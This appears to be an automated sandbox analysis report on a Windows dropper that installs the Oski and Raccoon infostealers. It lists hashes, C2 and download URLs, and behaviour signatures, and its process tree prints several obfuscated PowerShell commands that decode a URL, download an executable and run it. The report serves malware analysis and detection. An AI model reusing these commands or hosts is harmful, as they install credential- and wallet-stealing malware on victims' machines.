Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
29-10-2021 03:35
General
-
Target
5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe
-
Size
45KB
-
MD5
6695ddd2891c24fc85a47ad37bd57f3f
-
SHA1
648c4f0115f50e4186e44fade356f635dc995362
-
SHA256
5edb1348236c7fa03dae6c9e2d3c9e4241c2eaa2a8721e5c4b78abc9b66075f8
-
SHA512
51bc34f6b07df6bc8eaed91f85516441403c89c2260fcc1e7d359eed777dedf2339cc82ea4645535c7ad141a35f4b642e1bbfadbd4e6270f0ad2cbba30f91084
Malware Config
Extracted
http://bit.do/e5K5i
http://bit.do/e5K5i
Extracted
http://kfdhsa.ru/asdfg.exe
http://kfdhsa.ru/asdfg.exe
Extracted
http://bit.do/e5K4M
http://bit.do/e5K4M
Extracted
http://bratiop.ru/asdfg.exe
http://bratiop.ru/asdfg.exe
Extracted
http://bit.do/e5K4b
http://bit.do/e5K4b
Extracted
http://nicoslag.ru/asdfg.exe
http://nicoslag.ru/asdfg.exe
Extracted
oski
scarsa.ac.ug
Extracted
raccoon
b76017a227a0d879dec7c76613918569d03892fb
-
url4cnc
http://telegka.top/brikitiki
http://telegin.top/brikitiki
https://t.me/brikitiki
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Blocklisted process makes network request 5 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E919.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\gen.exegen.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EA41.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\gen.exe"4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xjd.exe"C:\Users\Public\xjd.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 2796 & erase C:\Users\Admin\AppData\Local\Temp\Vereransa.exe & RD /S /Q C:\\ProgramData\\100529277990392\\* & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 279611⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\fgr.exe"C:\Users\Public\fgr.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4644 & erase C:\Users\Admin\AppData\Local\Temp\Vereransa.exe & RD /S /Q C:\\ProgramData\\721009299238694\\* & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 464411⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\fgr.exe"C:\Users\Public\fgr.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
b751492c41c6f3173d3b6f31c1b9b4eb
SHA1abc53a2c939b1d774940deb0b888b7b1ba5a3c7b
SHA256ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457
SHA512afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
7cd9a0e7d1481fbac0f7452933f6d0f9
SHA14d569646217f006b755c4883dc30e9fb12a5ee68
SHA25608a3c2b25c1e1f2accfe1f1317a0f52eddfb54bf9c573064acafbd7b28f468cf
SHA512ee4d9e3f32d76b72caef175ea86e61ecb3887c35f16c7814b7255f89bfe27eb227392d521310d92e3be08c6c9d20646f01ead44e3bb6fbb92d64cc4769d915ed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
7cd9a0e7d1481fbac0f7452933f6d0f9
SHA14d569646217f006b755c4883dc30e9fb12a5ee68
SHA25608a3c2b25c1e1f2accfe1f1317a0f52eddfb54bf9c573064acafbd7b28f468cf
SHA512ee4d9e3f32d76b72caef175ea86e61ecb3887c35f16c7814b7255f89bfe27eb227392d521310d92e3be08c6c9d20646f01ead44e3bb6fbb92d64cc4769d915ed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
7cd9a0e7d1481fbac0f7452933f6d0f9
SHA14d569646217f006b755c4883dc30e9fb12a5ee68
SHA25608a3c2b25c1e1f2accfe1f1317a0f52eddfb54bf9c573064acafbd7b28f468cf
SHA512ee4d9e3f32d76b72caef175ea86e61ecb3887c35f16c7814b7255f89bfe27eb227392d521310d92e3be08c6c9d20646f01ead44e3bb6fbb92d64cc4769d915ed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
4444252ef2d74fd3628af5030e0edb9f
SHA113e8b9418ec5e041cc6f6f05732419c4cd9071a0
SHA256e9a0e362fd5d3e11e537725e0d1e37491a09fe1e72673ccd4ceace847fe06736
SHA512ea1dea3e0387100acc825005038f53e209abd8d31cee184eeafcf4415b6f1dc951e517b3e23aa30ba35a28d233fa5f7a443e0f8570c921415844be4ad672a99f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
7c96c235c46d54f683572787900ab8ed
SHA1f7423e0179be3a732baead4fd4095d03502d0d12
SHA2563e45a54b6640b8f4e826ca08df194d3a48819a43ce755dcbf324d2bddbe2569b
SHA512eb07ea9a9b2fe3e0032480dfc132d6471b165dd5de02a20f9398c97f9bda5c791f56d1c4414a9c50f07ca1e8e9d96342707e2071165271c066c7852ad736f6d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f03c4144296f12888f769d1618868814
SHA15d9c62379c421dc5b8d0d06989722eb7dc064f43
SHA256de3718086f6803d687fc9649b766151c383c468862b5dd4792a861d702d4f16f
SHA5129b3efb3edb16773479309ee542f99ca44ef03e3b614cd73ab16ed8bf39108ecabdb7fe100c5b805d12fb10899cda289de35f0e1390dc0458442cc66a7a202465
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
31a0dcbf37d92f3387f8d05cb046f688
SHA1be04004b8add22d98c8ff2abdeb6bfa77b678f89
SHA25662d85c2fbe4343df498cdc8991a6037ca3c576b60538194964b2a9720e32768a
SHA512dd682100a0a95b8c0d8fc56734cc87296ed69f0783866ade6ac94770f48b6ef4e2239775c172870f5c91588728cb274ac7c511c466a0152f738dd1e94c4954a2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
dbc67212ffbfcd19f3e6dcc255ff0575
SHA1a2a00a09840d0d67507a3a434178e4b8938d9692
SHA2569d6292ea7ba51e193a2b9413a650dce0ebdf5f734faed75691a7fc036e1b2254
SHA5125e5a117febbaa7d94b590c545b2883c8b14cdae431474fc3688a997173d8d8da4ac68873f7a94ce1abb3b6db66e65e7413f7e1d16dd86971c4ff3ae43a6aaa3e
-
C:\Users\Admin\AppData\Local\Temp\E919.tmp\start.batMD5
210943872932de11fcdf7ea3723bc5c6
SHA11441e366faf476759ee83c868ed8c3fa6dddef49
SHA2568e02b4a77db3465df283dca7afcbe9bcf1776763b63fd3dab5fd7e98316225e2
SHA5129bb03b0d67b5f2e36c1560d136d21157b2b32c205349af4851a632c2924d2daed96ca70ddbe68cab47b18dc611b78da8902c34c6844c3b99bec7693a49db73d2
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b1.htaMD5
e66d251ec771c96871b379e9190ff7a1
SHA137f14cd2f77b3f1877e266dc1f7e8df882119912
SHA2562778e5c8e94981206b305108d42ac9c9d7be5f36eaf94cab2483120e9d3d3696
SHA5124a8c886a828f61b031e9169886711da85d411535e2b6b1062614cd3fee4947fe340a60125dd0f30523a359ca677debbeba15ed55497e2bbe24787dfa5309ce88
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b1a.htaMD5
5fc9f573414f4bdf535974dcc5812b87
SHA1028b64ccbb98e650ee4909de019b0ff2da4cd138
SHA2563b282cd60bc0c9689b4a68d2013f986e3534190042c8359be580db7004803118
SHA512dfaaa82faa1ea65ed4da21bcebf7ca9821feef63b6ebb6b5d9ad40dd839520e2dffd4ed90fa10e2dbe670f377e6ad5bd59f4fcf115e29e693493325558ce253c
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b2.htaMD5
68950206a64bdad979c35f5e4a67e8be
SHA1d2789c3e940275ba2c30a6b5eb8c91da5751f1f9
SHA2564864a18f70757f92fcf8631c918687e528768165dff70b8f5ebacd29a256e6bf
SHA5128ca1391b917ff14b3c3b4f3145d9248b0ca154033646b9efbf3121d1a150ccfe5fad005a20f61b19ca95486e9d00caef9c12b98f5dba65a3a9ed84a6394c1d57
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\b2a.htaMD5
aad742136ab66a8cedceeb0d5175c249
SHA198103efcf3c76f5b5ba4ad208702ac49e8da1f4f
SHA25663f208e5dc8a4bf02bb5ed4e65a8e187bfbbe43856d6546fdb49efa555b46af6
SHA51223e0c5c6bb379610fe37ef64f5b3e49152c6d221229a6f4dc448d6076506f9c4b72e36691fa12d761c6fc32d96cba810e6ad6406d8ef6f29bd294cb951867093
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\m1.htaMD5
a75bddf46ecdadb3cbf1ff26a9c52c9e
SHA11c58d74bba1df1293494e248abd35d38153696df
SHA256fc97cfcd0a76d1e8fbffb3c2ae137bdd08f5e05114c20c8049cc52d08421b287
SHA512054464f5a10a4694ccfe3ec760e38afee83873d8b1d40b58bd1193a0f609ae57c0e7725c5a139dbdd61e8cd5b69f9ad1d1448aee03c594ee7d948a0fc8b4b5e8
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\m1a.htaMD5
f4db89dbe45cd8e7fb12009af13a9608
SHA1b8682e5b10d93b32e01858355e50fd2c7daafde3
SHA25648a17e20a2f884bf3d97e30a43bc7af1141832f28fc4feeb33ade73e4c9487aa
SHA512b5df1b079ad5fda423a0bdd62bf2c0fb3c825ec3a237f36eef40bc4a572cf30bef2b434d448c93c52bfc1cbed3b1bc9b93b10ffe124f7cbd3f66f5aaa894b182
-
C:\Users\Admin\AppData\Local\Temp\EA41.tmp\start2.batMD5
b775a1ac4fb96d9d35bbded9ea742f0c
SHA199b0c8d6cb5769f6aa2d292d4d9471d35ce66881
SHA256d6956455e62011b28826a709db4e65a7b3595023512349d2681f22a07e6f1ce8
SHA51285486d7b50a3ba35713b6f134286c2af35033ca392ef2b47d88516aafca6ea8cd245ce6be67e5c728fd539ed7da5c9a3291ed7b0b39cb5259939e84fb6a4052c
-
